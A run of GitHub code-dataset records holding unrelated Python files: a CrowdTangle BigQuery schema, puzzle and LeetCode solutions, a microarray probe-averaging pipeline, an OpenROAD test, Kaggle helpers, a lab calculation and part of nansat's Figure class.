\"name\": \"upCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"wowCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"thankfulCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"careCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n }\n ]\n },\n 'post_statistics_expected': {\n \"description\": \"Expected performance metrics associated with the post.\",\n \"name\": \"post_statistics_expected\",\n \"type\": \"RECORD\",\n \"mode\": \"REQUIRED\",\n \"fields\": [\n {\n \"description\": \"format (\\\"account.id|postExternalId\\\") The unique identifier of the post in the CrowdTangle system. 
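The dictionaries in `CROWDTANGLE_BIGQUERY_SCHEMAS` mirror BigQuery's schema JSON; to actually create tables from them they would have to become `google.cloud.bigquery.SchemaField` objects. A hedged sketch of that conversion (recursing into nested RECORDs; the nonstandard `PRIMARY_KEY` mode used above has no BigQuery equivalent, so it is coerced here):

```python
from google.cloud import bigquery

def to_schema_field(spec: dict) -> bigquery.SchemaField:
    # BigQuery only accepts NULLABLE/REQUIRED/REPEATED; anything else
    # (e.g. the PRIMARY_KEY marker used in these dicts) becomes REQUIRED.
    mode = spec.get("mode", "NULLABLE")
    if mode not in ("NULLABLE", "REQUIRED", "REPEATED"):
        mode = "REQUIRED"
    return bigquery.SchemaField(
        name=spec["name"],
        field_type=spec["type"],
        mode=mode,
        description=spec.get("description"),
        # Recurse into RECORD fields; empty for leaf columns.
        fields=[to_schema_field(f) for f in spec.get("fields", [])],
    )
```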
This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"post_id\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"angryCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook, Instagram, Reddit\",\n \"name\": \"commentCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Instagram\",\n \"name\": \"favoriteCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"hahaCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"likeCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"loveCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"sadCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"shareCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Reddit\",\n \"name\": \"upCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"wowCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"thankfulCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"careCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n }\n ]\n },\n 'expanded_links': {\n \"description\": \"List of links as shown to user (original) links that came in the post (which are often shortened), and the expanded links.\",\n \"name\": \"expanded_links\",\n \"type\": \"RECORD\",\n \"mode\": \"REPEATED\",\n \"fields\": [\n {\n \"description\": \"format (\\\"account.id|postExternalId\\\") The unique identifier of the post in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"post_id\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"Expanded version of original link\",\n \"name\": \"expanded\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"original link that came in the post (which are often shortened),\",\n \"name\": \"original\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n ]\n },\n 'media': {\n \"description\": \"Available media for a post.\",\n \"mode\": \"REPEATED\",\n \"name\": \"media\",\n \"type\": \"RECORD\",\n \"fields\": [\n {\n \"description\": \"format (\\\"account.id|postExternalId\\\") The unique identifier of the post in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"post_id\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The source of the full-sized version of the media. 
API returns this as |full| but that is a reserved word in postgres\",\n \"name\": \"url_full\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The source of the media.\",\n \"name\": \"url\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The width of the media.\",\n \"name\": \"width\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The height of the media.\",\n \"name\": \"height\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The type of the media. enum (photo or video)\",\n \"name\": \"type\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n ]\n }\n}\n","repo_name":"CybersecurityForDemocracy/FacebookApiPolAdsCollector","sub_path":"crowdtangle/crowdtangle_bigquery_schema.py","file_name":"crowdtangle_bigquery_schema.py","file_ext":"py","file_size_in_byte":18397,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"61"} +{"seq_id":"13697126450","text":"file = open(\"day8_digits_input.txt\")\nlines = file.readlines()\n\nresult = 0\ndigits = []\n\none = ''\nfour = ''\nseven = ''\neight = ''\n\nfiveParts = []\nsixParts = []\n\n\nfor i in range(len(lines)) :\n line = lines[i].strip().split(\"|\")\n patterns = line[0].split(\" \")\n output = line[1].split(\" \")\n \n fiveParts = []\n sixParts = []\n\n for j in range(len(patterns)) :\n digit = patterns[j]\n length = len(digit)\n\n if length == 2 :\n one = digit\n elif length == 4 :\n four = digit\n elif length == 3 :\n seven = digit\n elif length == 7 :\n eight = digit\n elif length == 5 :\n fiveParts.append(digit)\n elif length == 6 :\n sixParts.append(digit)\n \n zero = ''\n two = ''\n three = ''\n five = ''\n six = ''\n nine = ''\n\n for k in range(len(fiveParts)) :\n guess = fiveParts[k]\n # is three?\n count = 0\n for letter in guess :\n for element in one :\n if letter == element :\n count = count + 1\n\n if count == 2 :\n three = guess\n else :\n # is five\n count = 0\n for letter in guess :\n for element in four :\n if letter == element :\n count = count + 1\n \n if count == 3 :\n five = guess\n else :\n two = guess \n\n for k in range(len(sixParts)) :\n guess = sixParts[k]\n\n # is nine?\n count = 0\n for letter in guess :\n for element in four :\n if letter == element :\n count = count + 1\n\n if count == 4 :\n nine = guess\n else :\n # is zero?\n count = 0\n for letter in guess :\n for element in one :\n if letter == element :\n count = count + 1\n \n if count == 2 :\n zero = guess\n else :\n six = guess \n \n digits = [zero, one, two, three, four, five, six, seven, eight, nine]\n \n number = 0\n\n for j in range(len(output)) :\n value = output[j]\n\n for k in range(len(digits)) :\n digit = digits[k]\n\n count = 0\n for letter in value :\n for element in digit :\n if letter == element :\n count = count + 1\n # print(k, digit, value)\n if count == len(value) and count == len(digit) :\n number = number * 10 + k\n\n result = result + number\n\nprint(result)\n","repo_name":"aerlevsedi/advent-of-code","sub_path":"AoC2021/day8_digits/day8_B_digits.py","file_name":"day8_B_digits.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3108110982","text":"'''\nBinary Tree Preorder Traversal\n\nGiven the root of a binary tree, return the preorder traversal of its nodes' values.\n'''\n\n# recursive\nclass Solution:\n def preorderTraversal(self, root: Optional[TreeNode]) -> 
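The nested dictionaries in crowdtangle_bigquery_schema.py mirror BigQuery's JSON schema format. A minimal sketch of turning one of these entries into client-library objects, assuming the google-cloud-bigquery package (the recursion handles RECORD entries such as media and expanded_links; note that the "PRIMARY_KEY" mode used above is not a standard BigQuery mode, the standard ones being NULLABLE, REQUIRED and REPEATED, so a real conversion would have to remap it):

from google.cloud import bigquery

def to_schema_field(entry):
    # Recursively convert one schema dict into a bigquery.SchemaField;
    # nested RECORD types carry their own "fields" list.
    subfields = [to_schema_field(f) for f in entry.get("fields", [])]
    return bigquery.SchemaField(
        name=entry["name"],
        field_type=entry["type"],
        mode=entry.get("mode", "NULLABLE"),
        description=entry.get("description"),
        fields=subfields,
    )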
List[int]:\n def preorder(root, l):\n if root:\n l.append(root.val)\n l = preorder(root.left, l)\n l = preorder(root.right, l)\n return l\n return preorder(root, [])\n\n# iterative - 1\nclass Solution:\n def preorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n stack = []\n res = []\n while(len(stack) or root!=None):\n while(root):\n res.append(root.val)\n if(root.right):\n stack.append(root.right)\n root = root.left\n if(len(stack)>0):\n root = stack[-1]\n stack.pop()\n return res\n\n# iterative - 2\nclass Solution:\n def preorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n stack = [root]\n res = []\n while stack:\n root = stack.pop()\n if(root):\n res.append(root.val)\n stack.append(root.right)\n stack.append(root.left)\n return res\n","repo_name":"EshikaShah/My-journey-of-competitive-programming","sub_path":"Python/Binary Tree/preorder_traversal.py","file_name":"preorder_traversal.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24584834323","text":"import subprocess\nimport glob\nimport logging\nfrom natsort import natsorted\nfrom prevent_overwrite import prevent_overwrite\n\ndef make_norm_gpr_list(normgprdir, normgprlist):\n \"\"\"Makes a file listing all the normalized, masliner adjusted gpr files\n\n Inputs:\n normgprdir: the path to the directory containing the normalized,\n masliner adjusted gpr files\n NOTE: This assumes that all files of the form 'norm_madj*.gpr'\n should be included\n normgprlist: the path to the output list file\n \"\"\"\n # Do not overwrite normgprlist if it already exists\n prevent_overwrite(normgprlist)\n\n # Get full paths to all files in normgprdir of the form 'norm_madj*.gpr'\n files = glob.glob(normgprdir + '/norm_madj*.gpr')\n files = natsorted(files)\n\n # Write list to normgprlist\n with open(normgprlist, 'w') as f:\n for filename in files:\n f.write(filename + '\\n')\n\n\ndef make_average_probes_comfile(normgprlist, avgtype, comfile):\n \"\"\"Makes a comfile for averaging probe intensities\n\n Inputs:\n normgprlist: the path to the file listing the normalized, masliner\n adjusted gpr files\n avgtype: the type of averaging to perform:\n must be one of ('or', 'br', 'r')\n comfile: the path to the output comfile to write\n \"\"\"\n # Do not overwrite comfile if it already exists\n prevent_overwrite(comfile)\n\n # Open comfile for writing\n with open(comfile, 'w') as f:\n f.write('perl /project/siggers/perl/GENEPIX/' +\n 'average_replicate_rc_custom_probes.pl\\n\\n')\n f.write('-l ' + normgprlist + '\\n')\n f.write('-op ' + avgtype + '\\n')\n f.write('-avg ' + avgtype + '\\n')\n f.write('-no_gfilter')\n\n\ndef run_average_probes_comfile(comfile, avgtype):\n \"\"\"Runs a comfile for averaging probe intensities\n\n Inputs:\n comfile: the comfile to run\n avgtype: the type of averaging to perform:\n must be one of ('or', 'br', 'r')\n This affects the names of the output and error files for this job\n \"\"\"\n # Read contents of comfile as single string on one line\n with open(comfile) as f:\n comfilecont = f.read().replace('\\n', ' ')\n\n # Run comfile\n logging.info('qsub -sync y -P siggers -m a -cwd -N avg_' +\n avgtype + ' -V -b y ' + comfilecont + '\\n')\n subprocess.run(['qsub', '-sync', 'y', '-P', 'siggers', '-m', 'a', '-cwd',\n '-N', 'avg_' + avgtype, '-V', '-b', 'y', comfilecont])\n\n\ndef average_probes_wrapper(normgprdir, avggprdir):\n \"\"\"Averages probe intensities for all normalized gpr files in a directory\n\n 
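The three preorder implementations above all assume LeetCode's environment, where TreeNode and the typing names Optional/List are pre-imported. A quick self-contained check with a minimal TreeNode stub and a hypothetical tree (Solution here is whichever of the three classes was defined last):

from typing import List, Optional

class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

# Tree:   1
#        / \
#       2   3
root = TreeNode(1, TreeNode(2), TreeNode(3))
assert Solution().preorderTraversal(root) == [1, 2, 3]  # root, then left, then right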
Inputs:\n normgprdir: the path to the directory containing the masliner adjusted,\n spatially detrended gpr files to use\n avggprdir: the path to the directory in which to save the output files\n \"\"\"\n # If avggprdir already exists, abort to prevent overwrite\n prevent_overwrite(avggprdir)\n\n # Make avggprdir\n logging.info('Making directory to save averaged gpr files: ' + avggprdir)\n subprocess.run(['mkdir', avggprdir])\n \n # Navigate to avggprdir after saving current working directory\n cwd = subprocess.os.getcwd()\n subprocess.os.chdir(avggprdir)\n \n # Make a file listing all the normalized gpr files to use\n logging.info('Making a list of all normalized gpr files')\n normgprlist = avggprdir + '/norm_gpr.list'\n make_norm_gpr_list(normgprdir, normgprlist)\n \n # Make and run a comfile for averaging probe intensities each of three ways\n for avgtype in ['or', 'br', 'r']:\n logging.info('Making ' + avgtype + ' comfile')\n comfile = 'average_probes_' + avgtype + '.com'\n make_average_probes_comfile(normgprlist, avgtype, comfile)\n logging.info('Running ' + avgtype + ' comfile ' +\n '(this may take a few minutes)')\n run_average_probes_comfile(comfile, avgtype)\n \n # Navigate back to original directory\n subprocess.os.chdir(cwd)\n\n\n","repo_name":"Siggers-Lab/auto_PBM_prepro","sub_path":"average_probes.py","file_name":"average_probes.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18043504767","text":"from openroad import Design, Tech\nimport pdn_aux\nimport helpers\n\ntech = Tech()\ntech.readLef(\"asap7_vias/asap7_tech_1x_noviarules.lef\")\ntech.readLef(\"asap7_vias/asap7sc7p5t_27_R_1x.lef\")\n\ndesign = Design(tech)\ndesign.readDef(\"asap7_vias/floorplan.def\")\n\npdn_aux.add_global_connection(design, net_name=\"VDD\", pin_pattern=\"^VDD$\", power=True)\npdn_aux.add_global_connection(design, net_name=\"VSS\", pin_pattern=\"^VSS$\", ground=True)\n\npdn_aux.set_voltage_domain(design, power='VDD', ground='VSS')\n\npdn_aux.define_pdn_grid_real(design, name=\"Core\")\npdn_aux.add_pdn_stripe(design, followpins=True, layer=\"M1\", width=0.072)\n\ntry:\n pdn_aux.add_pdn_stripe(design, followpins=True, layer=\"M2\", width=0.072)\nexcept Exception as inst:\n print(inst.args[0])\n","repo_name":"The-OpenROAD-Project/OpenROAD","sub_path":"src/pdn/test/widthtable.py","file_name":"widthtable.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1027,"dataset":"github-code","pt":"61"} +{"seq_id":"27255972043","text":"#!/usr/bin/python\nimport os\ntables = [\"postcode\", \"language\", \"food\", \"weekday_names\", \"restaurant\", \"restaurant_schedule\", \"restaurant_has_food\",\n \"restaurant_transl\", \"food_transl\"]\n\n#create php names: foo_bar => FooBar\ntablesphp = []\nfor table in tables:\n tablesphp.append((table,\"\".join(map(lambda x: x.capitalize(), table.split('_')))))\n\nfor table in tablesphp:\n filename = \"app/\" + table[0] + \".php\"\n if os.path.exists(filename):\n os.remove(filename)\n\nfor table in tablesphp:\n os.system(\"php artisan krlove:generate:model \" + table[1] + \" --table-name=\" + table[0] + \" --no-timestamps\")\n\n#php artisan make:controller RestaurantController -m 
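make_norm_gpr_list sorts with natsorted so that numeric suffixes order naturally; plain sorted() would put norm_madj10.gpr before norm_madj2.gpr. A small illustration, assuming the natsort package and hypothetical file names:

from natsort import natsorted

names = ["norm_madj10.gpr", "norm_madj2.gpr", "norm_madj1.gpr"]
print(sorted(names))     # ['norm_madj1.gpr', 'norm_madj10.gpr', 'norm_madj2.gpr']
print(natsorted(names))  # ['norm_madj1.gpr', 'norm_madj2.gpr', 'norm_madj10.gpr']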
Restaurant\n","repo_name":"pozhidaevak/food-finder","sub_path":"laravel/generateModels.py","file_name":"generateModels.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39117349503","text":"import numpy as np\nfrom uncertainties import ufloat\nfrom scipy.stats import stats\n\nD_theta, R1, R2, R3, R4, R5 = np.genfromtxt('glas.txt', unpack=True)\n\nT = 1 * 10**-3\nlam = 633 * 10**(-9)\ntheta_0 = 10 * np.pi / 180\ntheta = D_theta * (np.pi)/180\n\n\ndef n(lam, N, T, t):\n return (1-(lam * N)/(2*T*0.175*t))**(-1)\n\n\nn1_mean = ufloat(np.mean(n(lam, R1, T, theta)), stats.sem(n(lam, R1, T, theta)))\nn2_mean = ufloat(np.mean(n(lam, R2, T, theta)), stats.sem(n(lam, R2, T, theta)))\nn3_mean = ufloat(np.mean(n(lam, R3, T, theta)), stats.sem(n(lam, R3, T, theta)))\nn4_mean = ufloat(np.mean(n(lam, R4, T, theta)), stats.sem(n(lam, R4, T, theta)))\nn5_mean = ufloat(np.mean(n(lam, R5, T, theta)), stats.sem(n(lam, R5, T, theta)))\n\nn1 = n(lam, R1, T, theta)\nn2 = n(lam, R2, T, theta)\nn3 = n(lam, R3, T, theta)\nn4 = n(lam, R4, T, theta)\nn5 = n(lam, R5, T, theta)\n\n# np.append(n1, n1_mean)\n# np.append(n2, n2_mean)\n# np.append(n3, n3_mean)\n# np.append(n4, n4_mean)\n# np.append(n5, n5_mean)\n# np.append(theta, np.nan)\n\nprint(n1)\n\nnp.savetxt('TexTabellen/glas.txt', np.column_stack([\n theta * 180/np.pi,\n R1,\n n1,\n R2,\n n2,\n R3,\n n3,\n R4,\n n4,\n R5,\n n5\n ]), delimiter=' & ', newline=r' \\\\'+'\\n',\n fmt='%.0f & %.0f & %.2f & %.0f & %.2f & %.0f & %.2f & %.0f & %.2f & %.0f & %.2f')\n\n\nn_array = [n1_mean, n2_mean, n3_mean, n4_mean, n5_mean]\nn_best = np.mean(n_array)\n\nprint(n_array)\nprint(n_best)\n","repo_name":"FeGeyer/praktikum","sub_path":"BFP/InterferometrieV64/glas.py","file_name":"glas.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8995307789","text":"from time import time\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import fbeta_score\n\n\ndef load_train_datas(train_size, image_dim1, image_dim3, label_size, split):\n image_size = image_dim1 * image_dim1 * image_dim3\n t = time()\n with open(\"datas/train_x32.bin\", 'rb') as f:\n x = np.fromfile(f, dtype=np.uint8, count=train_size * image_size)\n x = x.reshape([train_size, image_size])\n print(\"training images loaded in {:4.2f} seconds\".format(time() - t))\n\n t = time()\n with open(\"datas/train_y32.bin\", 'rb') as f:\n y = np.fromfile(f, dtype=np.uint8, count=train_size * label_size)\n y = y.reshape([train_size, 17])\n print(\"training labels loaded in {:4.2f} seconds\".format(time() - t))\n print(\"\\n\")\n\n x = x / 255.0\n\n train_x, val_x, train_y, val_y = train_test_split(x, y, train_size=split)\n\n return train_x, val_x, train_y, val_y\n\n\ndef load_val_datas(val_size, image_dim1, image_dim3, label_size):\n image_size = image_dim1 * image_dim1 * image_dim3\n t = time()\n with open(\"datas/val_x32.bin\", 'rb') as f:\n x = np.fromfile(f, dtype=np.uint8, count=val_size * image_size)\n x = x.reshape([val_size, image_size])\n print(\"validation images loaded in {:4.2f} seconds\".format(time() - t))\n\n t = time()\n with open(\"datas/val_y32.bin\", 'rb') as f:\n y = np.fromfile(f, dtype=np.uint8, count=val_size * label_size)\n y = y.reshape([val_size, 17])\n print(\"validation labels loaded in {:4.2f} seconds\".format(time() - t))\n 
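glas.py pairs np.mean with scipy's standard error of the mean inside ufloat, so later arithmetic propagates the uncertainty automatically. A minimal sketch with hypothetical numbers, assuming the uncertainties package:

import numpy as np
from scipy.stats import sem
from uncertainties import ufloat

samples = np.array([1.50, 1.52, 1.49, 1.51])  # hypothetical refractive indices
n = ufloat(np.mean(samples), sem(samples))    # nominal value +/- standard error
print(n)      # e.g. 1.5050+/-0.0065
print(2 * n)  # the uncertainty is propagated through the arithmetic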
print(\"\\n\")\n\n x = x.reshape([val_size, image_dim1, image_dim1, image_dim3])\n x = x / 255.0\n\n return x, y\n\n\ndef load_test_datas(filename, test_size, image_dim1, image_dim3):\n image_size = image_dim1 * image_dim1 * image_dim3\n t = time()\n with open(filename, 'rb') as f:\n test_x = np.fromfile(f, dtype=np.uint8, count=test_size * image_size)\n test_x = test_x.reshape([test_size, image_size])\n print(\"testing images loaded in {:4.2f} seconds\".format(time() - t))\n test_x = test_x / 255.0\n\n return test_x\n\n\ndef make_predictions(model, test_size, image_size, n_colors):\n size = test_size[0]\n size_add = test_size[1]\n\n test_x = load_test_datas(\"datas/test_x32.bin\", size, image_size, n_colors)\n test_x = test_x.reshape([size, image_size, image_size, n_colors])\n predictions = model.predict(test_x, batch_size=128)\n\n test_x = load_test_datas(\"datas/test_x32-add.bin\", size_add, image_size, n_colors)\n test_x = test_x.reshape([size_add, image_size, image_size, n_colors])\n predictions_add = model.predict(test_x, batch_size=128)\n\n final_predictions = np.concatenate([predictions, predictions_add], axis=0)\n\n return final_predictions\n\n\ndef make_submissions(predictions, tresholds, keras_filenames, output_filename):\n print(\"making submissions file\")\n label_predictions = np.array(predictions) > tresholds\n mapper = dict(zip(keras_filenames, label_predictions))\n submissions = pd.read_csv(\"datas/sample_submission.csv\")\n\n label_map = dict(pd.read_csv(\"datas/label_dict.csv\").values)\n inv_label_map = {i: l for l, i in label_map.items()}\n\n for i in range(len(submissions)):\n current_filename = submissions[\"image_name\"].values[i]\n current_filename = \"test-jpg/\" + current_filename + \".jpg\"\n current_predictions = mapper[current_filename]\n s = \"\"\n index_positive = np.where(current_predictions == 1)[0]\n for j in index_positive:\n s += inv_label_map[j]\n s += \" \"\n submissions[\"tags\"].set_value(i, s)\n print(submissions.head())\n submissions.to_csv(output_filename, index=False)\n print(\"submissions file saved\")\n\n\ndef make_submissions_old(predictions, filename):\n label_predictions = np.array(predictions) > 0.2\n submissions = pd.read_csv(\"datas/sample_submission.csv\")\n\n label_map = dict(pd.read_csv(\"datas/label_dict.csv\").values)\n inv_label_map = {i: l for l, i in label_map.items()}\n\n for i in range(len(submissions)):\n s = \"\"\n index_positive = np.where(label_predictions[i] == 1)[0]\n for j in index_positive:\n s += inv_label_map[j]\n s += \" \"\n submissions[\"tags\"].set_value(i, s)\n\n print(submissions.head())\n submissions.to_csv(filename, index=False)\n\n\ndef optimise_f2_thresholds(y, p, verbose=True, resolution=100):\n def mf(x):\n p2 = np.zeros_like(p)\n for i in range(17):\n p2[:, i] = (p[:, i] > x[i]).astype(np.int)\n score = fbeta_score(y, p2, beta=2, average='samples')\n return score\n\n x = [0.2]*17\n for i in range(17):\n best_i2 = 0\n best_score = 0\n for i2 in range(resolution):\n i2 /= resolution\n x[i] = i2\n score = mf(x)\n if score > best_score:\n best_i2 = i2\n best_score = score\n x[i] = best_i2\n if verbose:\n print(i, best_i2, best_score)\n\n return x\n","repo_name":"nyounes/kaggle","sub_path":"amazon/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43909310062","text":"from math import cos, asin, sqrt, pi\n\nfrom services.scraper.models.position import Position as 
PositionOld\nfrom models.position import Position as PositionNew\n\n\n# returns distance in km on the globe\ndef distance(pos1, pos2):\n if isinstance(pos1, PositionOld) or isinstance(pos1, PositionNew):\n lat1 = float(pos1.lat)\n lon1 = float(pos1.lon)\n else:\n lat1 = float(pos1[0])\n lon1 = float(pos1[1])\n if isinstance(pos2, PositionOld) or isinstance(pos2, PositionNew):\n lat2 = float(pos2.lat)\n lon2 = float(pos2.lon)\n else:\n lat2 = float(pos2[0])\n lon2 = float(pos2[1])\n p = pi / 180\n a = 0.5 - cos((lat2 - lat1) * p) / 2 + cos(lat1 * p) * cos(lat2 * p) * (1 - cos((lon2 - lon1) * p)) / 2\n return 12742 * asin(sqrt(a))\n\n\ndef is_in_poland(lat, lon):\n return (49 < float(lat) < 55) and (14 < float(lon) < 24)\n","repo_name":"mksochota16/fakeChecker","sub_path":"src/app/services/analysis/geolocation.py","file_name":"geolocation.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"23621921921","text":"import itertools as it\n\ndef xor(g):\n\tif len(g)==0:\n\t\treturn 0\n\tif len(g)==1:\n\t\treturn g[0]\n\tg=\"^\".join([str(i) for i in g])\n\treturn eval(g)\n\nf=open(\"in.txt\")\nf_out=open(\"out.txt\",\"w\")\ncases=int(f.readline().strip())\nfor case in range(1,cases+1):\n\tn=int(f.readline().strip())\n\tcandys=map(int,f.readline().strip().split())\n\t#print \"Candys=:\",candys\n\tm=0\n\tfor r in range(1,n/2+1):\n\t\tgroups=it.combinations(candys,r)\n\t\tfor i in groups:\n\t\t\tgroup1=[j for j in i]\n\t\t\tgroup2=candys[:]\n\t\t\tfor ac in group1:\n\t\t\t\tgroup2.remove(ac)\n\t\t\t#print group1,group2, xor(group1),xor(group2)\n\t\t\tif xor(group1)==xor(group2):\n\t\t\t\tnum=max(sum(group1),sum(group2))\n\t\t\t\tif num>m:\n\t\t\t\t\tm=num\n\tif m==0:\n\t\tm=\"NO\"\n\tf_out.write(\"Case #%s: %s\\n\" %(case,m))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_76/917.py","file_name":"917.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33342220788","text":"from __future__ import absolute_import\n\nimport os\nfrom math import floor, log10\n\nimport numpy as np\ntry:\n if 'DISPLAY' not in os.environ:\n import matplotlib; matplotlib.use('Agg')\n from matplotlib import cm\nexcept ImportError:\n MATPLOT_LIB_IS_INSTALLED = False\nelse:\n MATPLOT_LIB_IS_INSTALLED = True\n\ntry:\n import Image\n import ImageDraw\n import ImageFont\nexcept:\n from PIL import Image, ImageDraw, ImageFont\n\nfrom nansat.utils import add_logger\n\n\nclass Figure(object):\n \"\"\"Perform operations with graphical files: create, append legend, save.\n\n Figure instance is created in the Nansat.write_figure method.\n The methods below are applied consequently in order to generate a figure\n from one or three bands, estimate min/max, apply logarithmic scaling,\n convert to uint8, append legend, save to a file\n\n **Modifies:** self.sizeX, self.sizeY (int), width and height of the image\n\n **Modifies:** self.pilImg (PIL image), figure\n\n **Modifies:** self.pilImgLegend (PIL image)\n\n Note\n ----\n If pilImgLegend is None, legend is not added to the figure.\n If it is replaced, pilImgLegend includes text string, color-bar,\n longName and units.\n\n Parameters\n -----------\n array : numpy array (2D or 3D)\n dataset from Nansat\n\n cmin : number (int ot float) or [number, number, number]\n 0, minimum value of varibale in the matrix to be shown\n cmax : number (int ot float) or 
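The distance() helper above accepts either Position objects or plain (lat, lon) pairs and returns kilometres on the sphere (the 12742 constant is the Earth's diameter in km). A usage sketch with hypothetical tuple coordinates:

warsaw = (52.2297, 21.0122)
krakow = (50.0647, 19.9450)
print(distance(warsaw, krakow))  # great-circle distance in km, roughly 250
print(is_in_poland(*warsaw))     # True: inside the 49-55 N / 14-24 E box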
[number, number, number]\n 1, minimum value of varibale in the matrix to be shown\n gamma : float, >0\n 2, coefficient for tone curve udjustment\n subsetArraySize : int\n 100000, size of the subset array which is used to get histogram\n numOfColor : int\n 250, number of colors for use of the palette.\n 254th is black and 255th is white.\n cmapName : string\n 'jet', name of Matplotlib colormaps\n see --> http://www.scipy.org/Cookbook/Matplotlib/Show_colormaps\n ratio : float, [0 1]\n 1.0, ratio of pixels which are used to write the figure\n numOfTicks : int\n 5, number of ticks on a colorbar\n titleString : string\n '', title of legend (1st line)\n caption : string\n '', caption of the legend (2nd line, e.g. long name and units)\n fontRatio : positive float\n 1, factor for changing the fontSize.\n fontSize : int\n 12, size of the font of title, caption and ticks.\n If not given, fontSize is calculated using fontRatio:\n fontSize = height / 45 * fontRatio.\n fontSize has priority over fontRatio\n logarithm : boolean, defult = False\n If True, tone curve is used to convert pixel values.\n If False, linear.\n legend : boolean, default = False\n if True, information as textString, colorbar, longName and\n units are added in the figure.\n mask_array : 2D numpy array, int, the shape should be equal to\n array.shape. If given, this array is used for masking land,\n clouds, etc on the output image. Value of the array are\n indices. LUT from mask_lut is used for coloring upon this\n indices.\n mask_lut : dictionary\n Look-Up-Table with colors for masking land, clouds etc. Used\n tgether with mask_array:\n {0, [0,0,0], 1, [100,100,100], 2: [150,150,150], 3: [0,0,255]}\n index\n\n - 0 - will have black color\n - 1 - dark gray\n - 2 - light gray\n - 3 - blue\n\n logoFileName : string\n name of the file with logo\n logoLocation : list of two int, default = [0,0]\n X and Y offset of the image\n If positive - offset is from left, upper edge\n If Negative - from right, lower edge\n Offset is calculated from the entire image legend inclusive\n logoSize : list of two int\n desired X,Y size of logo. If None - original size is used\n latGrid : numpy array\n full size array with latitudes. For adding lat/lon grid lines\n lonGrid : numpy array\n full size array with longitudes. 
